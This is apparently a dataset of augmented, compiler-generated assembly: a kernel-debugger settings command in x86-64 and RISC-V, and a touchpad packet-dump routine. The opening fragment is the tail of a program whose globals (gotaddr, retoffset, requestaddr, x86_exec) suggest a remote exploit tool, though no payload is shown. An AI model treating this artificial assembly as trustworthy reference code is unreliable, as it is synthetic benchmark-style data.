mv a1,s7 call sscanf@plt j .L2 .L3: lw a0,8(s0) call atoi@plt slliw a0,a0,2 sw a0,36(s0) j .L2 .L28: call atoi@plt .L18: lw a0,8(s0) call atoi@plt mv a1,a0 lla a0,.LC3 call printf@plt j .L2 .L27: ld a0,0(s2) call usage@plt j .L17 .size main, .-main .globl x86_exec .globl target .globl sport .globl retoffset .globl requestaddr .globl port .globl optarg .globl gotaddr .globl EOF .globl g_aug_volatile_7944 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_7944, @object .size g_aug_volatile_7944, 4 g_aug_volatile_7944: .word 6 .bss .align 3 .set .LANCHOR1,. + 0 .type target, @object .size target, 8 target: .zero 8 .type optarg, @object .size optarg, 4 optarg: .zero 4 .zero 4 .type port, @object .size port, 8 port: .zero 8 .type sport, @object .size sport, 4 sport: .zero 4 .type gotaddr, @object .size gotaddr, 4 gotaddr: .zero 4 .type requestaddr, @object .size requestaddr, 4 requestaddr: .zero 4 .type retoffset, @object .size retoffset, 4 retoffset: .zero 4 .type EOF, @object .size EOF, 4 EOF: .zero 4 .zero 4 .type x86_exec, @object .size x86_exec, 8 x86_exec: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_kdb_cli.c_KdbpCmdSet_aug_v3_3
.file "extr_kdb_cli.c_KdbpCmdSet_aug_v3_3.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "intel" .LC1: .string "at&t" .LC2: .string "enabled" .LC3: .string "disabled" .LC4: .string "Available settings:\n" .LC5: .string " syntax [intel|at&t]\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC6: .string " condition [exception|*] [first|last] [never|always|kmode|umode]\n" .align 8 .LC7: .string " break_on_module_load [true|false]\n" .section .rodata.str1.1 .LC8: .string "syntax" .LC9: .string "syntax = %s\n" .LC10: .string "Unknown syntax '%s'.\n" .LC11: .string "condition" .section .rodata.str1.8 .align 8 .LC12: .string "Conditions: (First) (Last)\n" .section .rodata.str1.1 .LC13: .string " #%02d %-20s %-8s %-8s\n" .LC14: .string " %-20s %-8s %-8s\n" .LC15: .string "*" .LC16: .string "Unknown exception '%s'.\n" .LC17: .string "first" .LC18: .string "last" .section .rodata.str1.8 .align 8 .LC19: .string "set condition: second argument must be 'first' or 'last'\n" .section .rodata.str1.1 .LC20: .string "never" .LC21: .string "always" .LC22: .string "umode" .LC23: .string "kmode" .section .rodata.str1.8 .align 8 .LC24: .string "set condition: third argument must be 'never', 'always', 'umode' or 'kmode'\n" .align 8 .LC25: .string "Couldn't change condition for exception #%02d\n" .align 8 .LC26: .string "Couldn't change condition for all exceptions\n" .align 8 .LC27: .string "Condition for exception #%02d (%s): FirstChance %s LastChance %s\n" .align 8 .LC28: .string "Condition for all other exceptions: FirstChance %s LastChance %s\n" .section .rodata.str1.1 .LC29: .string "break_on_module_load" .LC30: .string "break_on_module_load = %s\n" .LC31: .string "enable" .LC32: .string "true" .LC33: .string "disable" .LC34: .string "false" .LC35: .string "Unknown setting '%s'.\n" .text .p2align 4 .type KdbpCmdSet, @function KdbpCmdSet: .LFB24: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $40, %rsp .cfi_def_cfa_offset 96 movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movl KdbDoNotEnter(%rip), %eax movq $0, 16(%rsp) movl %eax, 8(%rsp) movl %eax, 12(%rsp) cmpl $1, %edi je .L74 movl %edi, %ebx movq 8(%rsi), %rdi movq %rsi, %rbp leaq .LC8(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L4 cmpl $2, %ebx je .L75 jg .L7 .L72: movl TRUE(%rip), %eax .L1: movq 24(%rsp), %rdx subq %fs:40, %rdx jne .L76 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L4: .cfi_restore_state movq 8(%rbp), %rdi leaq .LC11(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L10 cmpl $2, %ebx je .L77 movq 16(%rbp), %rdi cmpl $4, %ebx jle .L21 leaq .LC15(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L78 movl $-1, %r14d .L20: movq 24(%rbp), %rdi leaq .LC17(%rip), %rsi call _stricmp@PLT movl TRUE(%rip), %r12d testq %rax, %rax jne .L79 .L28: movq 32(%rbp), %rdi leaq .LC20(%rip), %rsi call _stricmp@PLT movl KdbDoNotEnter(%rip), %edx testq %rax, %rax jne .L80 .L31: movl %r12d, %esi movl %r14d, %edi movl %edx, 8(%rsp) call KdbpSetEnterCondition@PLT testl %eax, %eax jne .L72 movl %r14d, %esi testl %r14d, %r14d js .L36 leaq .LC25(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L74: leaq .LC4(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT leaq .LC5(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT leaq .LC6(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT leaq .LC7(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L7: movq 16(%rbp), %rdi leaq .LC0(%rip), %rsi call _stricmp@PLT testq %rax, %rax jne .L8 movl TRUE(%rip), %eax movl %eax, KdbUseIntelSyntax(%rip) jmp .L1 .p2align 4,,10 .p2align 3 .L10: movq 8(%rbp), %rdi leaq .LC29(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L40 cmpl $2, %ebx je .L81 jle .L72 movq 16(%rbp), %rdi leaq .LC31(%rip), %rsi call _stricmp@PLT testq %rax, %rax jne .L44 .L45: movl TRUE(%rip), %eax movl %eax, KdbBreakOnModuleLoad(%rip) jmp .L1 .p2align 4,,10 .p2align 3 .L75: movl KdbUseIntelSyntax(%rip), %edx leaq .LC1(%rip), %rax leaq .LC0(%rip), %rsi leaq .LC9(%rip), %rdi testl %edx, %edx cmove %rax, %rsi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L78: movq 16(%rbp), %rdi .L21: leaq 16(%rsp), %rsi xorl %edx, %edx leaq ExceptionNames.0(%rip), %r12 call strtoul@PLT movl %eax, %r14d movq 16(%rsp), %rax cmpq %rax, 16(%rbp) je .L82 .L19: movq %r12, %rdi call RTL_NUMBER_OF@PLT cmpl %r14d, %eax jle .L83 cmpl $4, %ebx jg .L20 movl TRUE(%rip), %esi leaq 8(%rsp), %rdx movl %r14d, %edi call KdbpGetEnterCondition@PLT testl %eax, %eax je .L84 .L37: movl FALSE(%rip), %esi leaq 12(%rsp), %rdx movl %r14d, %edi call KdbpGetEnterCondition@PLT testl %eax, %eax je .L85 .L38: movq %r12, %rdi call RTL_NUMBER_OF@PLT movl 12(%rsp), %edi subl $1, %eax cmpl %r14d, %eax jle .L39 call KDB_ENTER_CONDITION_TO_STRING@PLT movl 8(%rsp), %edi movl %eax, %ebx call KDB_ENTER_CONDITION_TO_STRING@PLT movl %ebx, %r8d movl %r14d, %esi leaq .LC27(%rip), %rdi movl %eax, %ecx movslq %r14d, %rax movq (%r12,%rax,8), %rdx xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L40: movq 8(%rbp), %rsi leaq .LC35(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT jmp .L72 .p2align 4,,10 .p2align 3 .L8: movq 16(%rbp), %rdi leaq .LC1(%rip), %rsi call _stricmp@PLT testq %rax, %rax jne .L9 movl FALSE(%rip), %eax movl %eax, KdbUseIntelSyntax(%rip) movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L77: leaq .LC12(%rip), %rdi xorl %ebx, %ebx leaq ExceptionNames.0(%rip), %r12 call KdbpPrint@PLT leaq .LC13(%rip), %r13 jmp .L12 .p2align 4,,10 .p2align 3 .L14: movl FALSE(%rip), %esi leaq 12(%rsp), %rdx movl %ebp, %edi call KdbpGetEnterCondition@PLT testl %eax, %eax je .L86 .L15: movl 12(%rsp), %edi call KDB_ENTER_CONDITION_TO_STRING@PLT movl 8(%rsp), %edi movl %eax, %r15d call KDB_ENTER_CONDITION_TO_STRING@PLT movl %r15d, %r8d movq %r14, %rdx movl %ebp, %esi movl %eax, %ecx movq %r13, %rdi xorl %eax, %eax call KdbpPrint@PLT .L13: addq $1, %rbx .L12: movq %r12, %rdi movslq %ebx, %rbp call RTL_NUMBER_OF@PLT subl $1, %eax cmpl %ebx, %eax jle .L87 movq (%r12,%rbx,8), %r14 testq %r14, %r14 je .L13 movl TRUE(%rip), %esi leaq 8(%rsp), %rdx movl %ebp, %edi call KdbpGetEnterCondition@PLT testl %eax, %eax jne .L14 movl FALSE(%rip), %edi call ASSERT@PLT jmp .L14 .p2align 4,,10 .p2align 3 .L86: movl FALSE(%rip), %edi call ASSERT@PLT jmp .L15 .p2align 4,,10 .p2align 3 .L87: movq %r12, %rdi call RTL_NUMBER_OF@PLT xorl %edi, %edi subl $1, %eax cmpl %ebp, %eax sete %dil call ASSERT@PLT movl 12(%rsp), %edi call KDB_ENTER_CONDITION_TO_STRING@PLT movl 8(%rsp), %edi movl %eax, %r13d call KDB_ENTER_CONDITION_TO_STRING@PLT movq (%r12,%rbp,8), %rsi movl %r13d, %ecx leaq .LC14(%rip), %rdi movl %eax, %edx xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L82: xorl %r13d, %r13d leaq ExceptionNames.0(%rip), %r12 jmp .L18 .p2align 4,,10 .p2align 3 .L23: movq (%r12,%r13,8), %rdi testq %rdi, %rdi je .L22 movq 16(%rbp), %rsi call _stricmp@PLT .L22: addq $1, %r13 .L18: movq %r12, %rdi movl %r13d, %r14d call RTL_NUMBER_OF@PLT cmpl %r13d, %eax jg .L23 jmp .L19 .p2align 4,,10 .p2align 3 .L39: call KDB_ENTER_CONDITION_TO_STRING@PLT movl 8(%rsp), %edi movl %eax, %r12d call KDB_ENTER_CONDITION_TO_STRING@PLT movl %r12d, %edx leaq .LC28(%rip), %rdi movl %eax, %esi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L83: movq 16(%rbp), %rsi leaq .LC16(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L81: movl KdbBreakOnModuleLoad(%rip), %eax leaq .LC2(%rip), %rsi leaq .LC30(%rip), %rdi testl %eax, %eax leaq .LC3(%rip), %rax cmove %rax, %rsi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L79: movq 24(%rbp), %rdi leaq .LC18(%rip), %rsi call _stricmp@PLT testq %rax, %rax jne .L29 movl FALSE(%rip), %r12d jmp .L28 .p2align 4,,10 .p2align 3 .L85: movl FALSE(%rip), %edi call ASSERT@PLT jmp .L38 .p2align 4,,10 .p2align 3 .L84: movl FALSE(%rip), %edi call ASSERT@PLT jmp .L37 .p2align 4,,10 .p2align 3 .L80: movq 32(%rbp), %rdi leaq .LC21(%rip), %rsi call _stricmp@PLT movl KdbEnterAlways(%rip), %edx testq %rax, %rax je .L31 movq 32(%rbp), %rdi leaq .LC22(%rip), %rsi call _stricmp@PLT movl KdbEnterFromUmode(%rip), %edx testq %rax, %rax je .L31 movq 32(%rbp), %rdi leaq .LC23(%rip), %rsi call _stricmp@PLT testq %rax, %rax jne .L34 movl KdbEnterFromKmode(%rip), %edx jmp .L31 .p2align 4,,10 .p2align 3 .L9: movq 16(%rbp), %rsi leaq .LC10(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .L36: leaq .LC26(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .L44: movq 16(%rbp), %rdi leaq .LC2(%rip), %rsi call _stricmp@PLT testq %rax, %rax je .L45 movq 16(%rbp), %rdi leaq .LC32(%rip), %rsi call _stricmp@PLT testq %rax, %rax je .L45 movq 16(%rbp), %rdi leaq .LC33(%rip), %rsi call _stricmp@PLT testq %rax, %rax jne .L46 .L47: movl FALSE(%rip), %eax movl %eax, KdbBreakOnModuleLoad(%rip) movl TRUE(%rip), %eax jmp .L1 .L29: leaq .LC19(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .L76: call __stack_chk_fail@PLT .L34: leaq .LC24(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .L46: movq 16(%rbp), %rdi leaq .LC3(%rip), %rsi call _stricmp@PLT testq %rax, %rax je .L47 movq 16(%rbp), %rdi leaq .LC34(%rip), %rsi call _stricmp@PLT testq %rax, %rax je .L47 movq 16(%rbp), %rsi leaq .LC35(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .cfi_endproc .LFE24: .size KdbpCmdSet, .-KdbpCmdSet .section .rodata.str1.1 .LC36: .string "ZERODEVIDE" .LC37: .string "DEBUGTRAP" .LC38: .string "NMI" .LC39: .string "INT3" .LC40: .string "OVERFLOW" .LC41: .string "BOUND" .LC42: .string "INVALIDOP" .LC43: .string "NOMATHCOP" .LC44: .string "DOUBLEFAULT" .LC45: .string "RESERVED(9)" .LC46: .string "INVALIDTSS" .LC47: .string "SEGMENTNOTPRESENT" .LC48: .string "STACKFAULT" .LC49: .string "GPF" .LC50: .string "PAGEFAULT" .LC51: .string "RESERVED(15)" .LC52: .string "MATHFAULT" .LC53: .string "ALIGNMENTCHECK" .LC54: .string "MACHINECHECK" .LC55: .string "SIMDFAULT" .LC56: .string "OTHERS" .section .data.rel.ro.local,"aw" .align 32 .type ExceptionNames.0, @object .size ExceptionNames.0, 168 ExceptionNames.0: .quad .LC36 .quad .LC37 .quad .LC38 .quad .LC39 .quad .LC40 .quad .LC41 .quad .LC42 .quad .LC43 .quad .LC44 .quad .LC45 .quad .LC46 .quad .LC47 .quad .LC48 .quad .LC49 .quad .LC50 .quad .LC51 .quad .LC52 .quad .LC53 .quad .LC54 .quad .LC55 .quad .LC56 .globl TRUE .bss .align 4 .type TRUE, @object .size TRUE, 4 TRUE: .zero 4 .globl KdbUseIntelSyntax .align 4 .type KdbUseIntelSyntax, @object .size KdbUseIntelSyntax, 4 KdbUseIntelSyntax: .zero 4 .globl KdbEnterFromUmode .align 4 .type KdbEnterFromUmode, @object .size KdbEnterFromUmode, 4 KdbEnterFromUmode: .zero 4 .globl KdbEnterFromKmode .align 4 .type KdbEnterFromKmode, @object .size KdbEnterFromKmode, 4 KdbEnterFromKmode: .zero 4 .globl KdbEnterAlways .align 4 .type KdbEnterAlways, @object .size KdbEnterAlways, 4 KdbEnterAlways: .zero 4 .globl KdbDoNotEnter .align 4 .type KdbDoNotEnter, @object .size KdbDoNotEnter, 4 KdbDoNotEnter: .zero 4 .globl KdbBreakOnModuleLoad .align 4 .type KdbBreakOnModuleLoad, @object .size KdbBreakOnModuleLoad, 4 KdbBreakOnModuleLoad: .zero 4 .globl FALSE .align 4 .type FALSE, @object .size FALSE, 4 FALSE: .zero 4 .globl g_aug_volatile_3326 .data .align 4 .type g_aug_volatile_3326, @object .size g_aug_volatile_3326, 4 g_aug_volatile_3326: .long 5 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_kdb_cli.c_KdbpCmdSet_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "intel" .align 3 .LC1: .string "at&t" .align 3 .LC2: .string "enabled" .align 3 .LC3: .string "disabled" .align 3 .LC4: .string "Available settings:\n" .align 3 .LC5: .string " syntax [intel|at&t]\n" .align 3 .LC6: .string " condition [exception|*] [first|last] [never|always|kmode|umode]\n" .align 3 .LC7: .string " break_on_module_load [true|false]\n" .align 3 .LC8: .string "syntax" .align 3 .LC9: .string "syntax = %s\n" .align 3 .LC10: .string "Unknown syntax '%s'.\n" .align 3 .LC11: .string "condition" .align 3 .LC12: .string "Conditions: (First) (Last)\n" .align 3 .LC13: .string " #%02d %-20s %-8s %-8s\n" .align 3 .LC14: .string " %-20s %-8s %-8s\n" .align 3 .LC15: .string "*" .align 3 .LC16: .string "Unknown exception '%s'.\n" .align 3 .LC17: .string "first" .align 3 .LC18: .string "last" .align 3 .LC19: .string "set condition: second argument must be 'first' or 'last'\n" .align 3 .LC20: .string "never" .align 3 .LC21: .string "always" .align 3 .LC22: .string "umode" .align 3 .LC23: .string "kmode" .align 3 .LC24: .string "set condition: third argument must be 'never', 'always', 'umode' or 'kmode'\n" .align 3 .LC25: .string "Couldn't change condition for exception #%02d\n" .align 3 .LC26: .string "Couldn't change condition for all exceptions\n" .align 3 .LC27: .string "Condition for exception #%02d (%s): FirstChance %s LastChance %s\n" .align 3 .LC28: .string "Condition for all other exceptions: FirstChance %s LastChance %s\n" .align 3 .LC29: .string "break_on_module_load" .align 3 .LC30: .string "break_on_module_load = %s\n" .align 3 .LC31: .string "enable" .align 3 .LC32: .string "true" .align 3 .LC33: .string "disable" .align 3 .LC34: .string "false" .align 3 .LC35: .string "Unknown setting '%s'.\n" .text .align 1 .type KdbpCmdSet, @function KdbpCmdSet: addi sp,sp,-128 sd s2,96(sp) lla s2,.LANCHOR0 lw a5,0(s2) sd s3,88(sp) la s3,__stack_chk_guard sw a5,8(sp) sw a5,12(sp) sd ra,120(sp) sd s0,112(sp) sd s1,104(sp) sd s4,80(sp) sd s5,72(sp) sd s6,64(sp) sd s7,56(sp) sd s8,48(sp) sd s9,40(sp) ld a4, 0(s3) sd a4, 24(sp) li a4, 0 sd zero,16(sp) li a5,1 beq a0,a5,.L73 mv s0,a0 ld a0,8(a1) mv s1,a1 lla a1,.LC8 call strcmp@plt bne a0,zero,.L4 li a5,2 beq s0,a5,.L74 bgt s0,a5,.L7 .L71: lw a0,4(s2) .L25: ld a4, 24(sp) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 bne a5,zero,.L75 ld ra,120(sp) ld s0,112(sp) ld s1,104(sp) ld s2,96(sp) ld s3,88(sp) ld s4,80(sp) ld s5,72(sp) ld s6,64(sp) ld s7,56(sp) ld s8,48(sp) ld s9,40(sp) addi sp,sp,128 jr ra .L4: ld a0,8(s1) lla a1,.LC11 call strcmp@plt bne a0,zero,.L10 li a5,2 beq s0,a5,.L76 li a5,4 ld a0,16(s1) ble s0,a5,.L21 lla a1,.LC15 call strcmp@plt bne a0,zero,.L77 li s4,-1 .L20: ld a0,24(s1) lla a1,.LC17 call _stricmp@plt bne a0,zero,.L27 lw s0,4(s2) .L28: ld a0,32(s1) lla a1,.LC20 call _stricmp@plt bne a0,zero,.L30 lw a2,0(s2) .L31: mv a1,s0 mv a0,s4 sw a2,8(sp) call KdbpSetEnterCondition@plt bne a0,zero,.L71 mv a1,s4 blt s4,zero,.L36 lla a0,.LC25 call KdbpPrint@plt lw a0,4(s2) j .L25 .L73: lla a0,.LC4 call KdbpPrint@plt lla a0,.LC5 call KdbpPrint@plt lla a0,.LC6 call KdbpPrint@plt lla a0,.LC7 call KdbpPrint@plt lw a0,4(s2) j .L25 .L7: ld a0,16(s1) lla a1,.LC0 call _stricmp@plt bne a0,zero,.L8 lw a0,4(s2) sw a0,8(s2) j .L25 .L10: ld a0,8(s1) lla a1,.LC29 call strcmp@plt bne a0,zero,.L40 li a5,2 beq s0,a5,.L78 ble s0,a5,.L71 ld a0,16(s1) lla a1,.LC31 call _stricmp@plt bne a0,zero,.L44 .L45: lw a0,4(s2) sw a0,28(s2) j .L25 .L74: lw a5,8(s2) lla a1,.LC0 bne a5,zero,.L6 lla a1,.LC1 .L6: lla a0,.LC9 call KdbpPrint@plt lw a0,4(s2) j .L25 .L77: ld a0,16(s1) .L21: li a2,0 addi a1,sp,16 call strtoul@plt ld a4,16(s1) ld a5,16(sp) mv s4,a0 beq a4,a5,.L79 .L18: lla a0,.LANCHOR1 call RTL_NUMBER_OF@plt ble a0,s4,.L80 li a5,4 bgt s0,a5,.L20 lw a1,4(s2) addi a2,sp,8 mv a0,s4 call KdbpGetEnterCondition@plt beq a0,zero,.L81 .L37: lw a1,12(s2) addi a2,sp,12 mv a0,s4 call KdbpGetEnterCondition@plt beq a0,zero,.L82 .L38: lla s0,.LANCHOR1 mv a0,s0 call RTL_NUMBER_OF@plt addiw a0,a0,-1 ble a0,s4,.L39 lw a0,8(sp) slli a5,s4,3 add s0,s0,a5 ld s1,0(s0) call KDB_ENTER_CONDITION_TO_STRING@plt mv s0,a0 lw a0,12(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv a4,a0 mv a3,s0 mv a2,s1 mv a1,s4 lla a0,.LC27 call KdbpPrint@plt lw a0,4(s2) j .L25 .L40: ld a1,8(s1) lla a0,.LC35 call KdbpPrint@plt j .L71 .L8: ld a0,16(s1) lla a1,.LC1 call _stricmp@plt bne a0,zero,.L9 lw a5,12(s2) lw a0,4(s2) sw a5,8(s2) j .L25 .L76: lla a0,.LC12 lla s5,.LANCHOR1 call KdbpPrint@plt mv s1,s5 li s0,0 addi s8,sp,8 addi s7,sp,12 lla s6,.LC13 j .L12 .L14: lw a1,12(s2) mv a2,s7 mv a0,s0 call KdbpGetEnterCondition@plt beq a0,zero,.L83 .L15: lw a0,8(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv s4,a0 lw a0,12(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv a4,a0 mv a3,s4 mv a2,s9 mv a1,s0 mv a0,s6 call KdbpPrint@plt .L13: addiw s0,s0,1 addi s1,s1,8 .L12: mv a0,s5 call RTL_NUMBER_OF@plt addiw a0,a0,-1 ble a0,s0,.L84 ld s9,0(s1) beq s9,zero,.L13 lw a1,4(s2) mv a2,s8 mv a0,s0 call KdbpGetEnterCondition@plt bne a0,zero,.L14 lw a0,12(s2) call ASSERT@plt j .L14 .L83: lw a0,12(s2) call ASSERT@plt j .L15 .L84: lla a0,.LANCHOR1 call RTL_NUMBER_OF@plt addiw a0,a0,-1 sub a0,a0,s0 seqz a0,a0 call ASSERT@plt lw a0,8(sp) slli s0,s0,3 add s5,s5,s0 ld s1,0(s5) call KDB_ENTER_CONDITION_TO_STRING@plt mv s0,a0 lw a0,12(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv a3,a0 mv a2,s0 mv a1,s1 lla a0,.LC14 call KdbpPrint@plt lw a0,4(s2) j .L25 .L79: lla s5,.LANCHOR1 li s4,0 mv s6,s5 j .L19 .L23: ld a0,0(s5) beq a0,zero,.L22 ld a1,16(s1) call _stricmp@plt .L22: addiw s4,s4,1 addi s5,s5,8 .L19: mv a0,s6 call RTL_NUMBER_OF@plt bgt a0,s4,.L23 j .L18 .L39: lw a0,8(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv s0,a0 lw a0,12(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv a2,a0 mv a1,s0 lla a0,.LC28 call KdbpPrint@plt lw a0,4(s2) j .L25 .L80: ld a1,16(s1) lla a0,.LC16 call KdbpPrint@plt lw a0,4(s2) j .L25 .L78: lw a5,28(s2) lla a1,.LC2 bne a5,zero,.L42 lla a1,.LC3 .L42: lla a0,.LC30 call KdbpPrint@plt lw a0,4(s2) j .L25 .L27: ld a0,24(s1) lla a1,.LC18 call _stricmp@plt bne a0,zero,.L29 lw s0,12(s2) j .L28 .L82: lw a0,12(s2) call ASSERT@plt j .L38 .L81: lw a0,12(s2) call ASSERT@plt j .L37 .L30: ld a0,32(s1) lla a1,.LC21 call _stricmp@plt bne a0,zero,.L32 lw a2,16(s2) j .L31 .L9: ld a1,16(s1) lla a0,.LC10 call KdbpPrint@plt lw a0,4(s2) j .L25 .L36: lla a0,.LC26 call KdbpPrint@plt lw a0,4(s2) j .L25 .L32: ld a0,32(s1) lla a1,.LC22 call _stricmp@plt bne a0,zero,.L33 lw a2,20(s2) j .L31 .L44: ld a0,16(s1) lla a1,.LC2 call _stricmp@plt beq a0,zero,.L45 ld a0,16(s1) lla a1,.LC32 call _stricmp@plt beq a0,zero,.L45 ld a0,16(s1) lla a1,.LC33 call _stricmp@plt bne a0,zero,.L46 .L47: lw a5,12(s2) lw a0,4(s2) sw a5,28(s2) j .L25 .L29: lla a0,.LC19 call KdbpPrint@plt lw a0,4(s2) j .L25 .L33: ld a0,32(s1) lla a1,.LC23 call _stricmp@plt bne a0,zero,.L34 lw a2,24(s2) j .L31 .L75: call __stack_chk_fail@plt .L34: lla a0,.LC24 call KdbpPrint@plt lw a0,4(s2) j .L25 .L46: ld a0,16(s1) lla a1,.LC3 call _stricmp@plt beq a0,zero,.L47 ld a0,16(s1) lla a1,.LC34 call _stricmp@plt beq a0,zero,.L47 ld a1,16(s1) lla a0,.LC35 call KdbpPrint@plt lw a0,4(s2) j .L25 .size KdbpCmdSet, .-KdbpCmdSet .section .rodata.str1.8 .align 3 .LC36: .string "ZERODEVIDE" .align 3 .LC37: .string "DEBUGTRAP" .align 3 .LC38: .string "NMI" .align 3 .LC39: .string "INT3" .align 3 .LC40: .string "OVERFLOW" .align 3 .LC41: .string "BOUND" .align 3 .LC42: .string "INVALIDOP" .align 3 .LC43: .string "NOMATHCOP" .align 3 .LC44: .string "DOUBLEFAULT" .align 3 .LC45: .string "RESERVED(9)" .align 3 .LC46: .string "INVALIDTSS" .align 3 .LC47: .string "SEGMENTNOTPRESENT" .align 3 .LC48: .string "STACKFAULT" .align 3 .LC49: .string "GPF" .align 3 .LC50: .string "PAGEFAULT" .align 3 .LC51: .string "RESERVED(15)" .align 3 .LC52: .string "MATHFAULT" .align 3 .LC53: .string "ALIGNMENTCHECK" .align 3 .LC54: .string "MACHINECHECK" .align 3 .LC55: .string "SIMDFAULT" .align 3 .LC56: .string "OTHERS" .globl TRUE .globl KdbUseIntelSyntax .globl KdbEnterFromUmode .globl KdbEnterFromKmode .globl KdbEnterAlways .globl KdbDoNotEnter .globl KdbBreakOnModuleLoad .globl FALSE .globl g_aug_volatile_3326 .data .align 2 .type g_aug_volatile_3326, @object .size g_aug_volatile_3326, 4 g_aug_volatile_3326: .word 5 .bss .align 2 .set .LANCHOR0,. + 0 .type KdbDoNotEnter, @object .size KdbDoNotEnter, 4 KdbDoNotEnter: .zero 4 .type TRUE, @object .size TRUE, 4 TRUE: .zero 4 .type KdbUseIntelSyntax, @object .size KdbUseIntelSyntax, 4 KdbUseIntelSyntax: .zero 4 .type FALSE, @object .size FALSE, 4 FALSE: .zero 4 .type KdbEnterAlways, @object .size KdbEnterAlways, 4 KdbEnterAlways: .zero 4 .type KdbEnterFromUmode, @object .size KdbEnterFromUmode, 4 KdbEnterFromUmode: .zero 4 .type KdbEnterFromKmode, @object .size KdbEnterFromKmode, 4 KdbEnterFromKmode: .zero 4 .type KdbBreakOnModuleLoad, @object .size KdbBreakOnModuleLoad, 4 KdbBreakOnModuleLoad: .zero 4 .section .data.rel.ro.local,"aw" .align 3 .set .LANCHOR1,. + 0 .type ExceptionNames.0, @object .size ExceptionNames.0, 168 ExceptionNames.0: .dword .LC36 .dword .LC37 .dword .LC38 .dword .LC39 .dword .LC40 .dword .LC41 .dword .LC42 .dword .LC43 .dword .LC44 .dword .LC45 .dword .LC46 .dword .LC47 .dword .LC48 .dword .LC49 .dword .LC50 .dword .LC51 .dword .LC52 .dword .LC53 .dword .LC54 .dword .LC55 .dword .LC56 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_elantech.c_elantech_packet_dump_aug_v3_4
.file "extr_elantech.c_elantech_packet_dump_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "PS/2 packet [%*ph]\n" .text .p2align 4 .type elantech_packet_dump, @function elantech_packet_dump: .LFB1: .cfi_startproc endbr64 movl 4(%rdi), %ecx movl (%rdi), %r8d movq %rdi, %rsi leaq .LC0(%rip), %rdx movl KERN_DEBUG(%rip), %edi jmp psmouse_printk@PLT .cfi_endproc .LFE1: .size elantech_packet_dump, .-elantech_packet_dump .globl KERN_DEBUG .bss .align 4 .type KERN_DEBUG, @object .size KERN_DEBUG, 4 KERN_DEBUG: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
